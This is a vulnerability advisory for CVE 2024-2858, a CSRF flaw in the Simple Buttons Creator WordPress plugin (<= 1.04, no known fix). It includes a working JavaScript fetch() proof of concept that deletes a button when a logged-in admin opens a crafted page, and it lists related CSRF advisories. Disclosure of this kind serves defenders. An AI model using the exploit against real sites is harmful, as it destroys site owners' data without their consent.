Simple Buttons Creator <= 1.04 – Aribtrary Button Deletion via CSRF | CVE 2024-2858 | Plugin Vulnerabilities

Description

The plugin does not have CSRF checks in some places, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks

Proof of Concept

Make a logged in admin open a page with the code below (where `<<VALID_ID>>` is an existing button):

```
fetch("https://example.com/wp-admin/admin.php?page=simple-buttons", {
  "headers": {
    "content-type": "application/x-www-form-urlencoded",
  },
  "method": "POST",
  "body": 'method=delete&id=<<VALID_ID>>',
  "credentials": "include"
}).then(response => response.text())
  .then(data => console.log(data));
```

Affects Plugins

simple-buttons-creator

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

Miscellaneous

Original Researcher

Bob Matyas

Submitter

Bob Matyas

Submitter website

https://www.bobmatyas.com

Submitter twitter

Verified

Yes

WPVDB ID

43297210-17a6-4b51-b8ca-32ceef9fc09a

Timeline

Publicly Published

2024-03-25 (about 1 months ago)

Added

2024-03-25 (about 1 months ago)

Last Updated

2024-03-25 (about 1 months ago)

Other

Published

Title

Published

2023-09-25

Title

BEAR for WordPress < 1.1.4 - Arbitrary Settings Update via CSRF

Published

2022-09-14

Title

Advanced Dynamic Pricing for WooCommerce < 4.1.4 - Settings Update via CSRF

Published

2023-11-13

Title

Stop Referrer Spam < 1.3.1 - CSRF

Published

2024-02-01

Title

Orbit Fox by ThemeIsle < 2.10.30 - Connected API Keys Update via CSRF

Published

2023-02-06

Title

Conversios.io < 5.2.4 - Settings Update via CSRF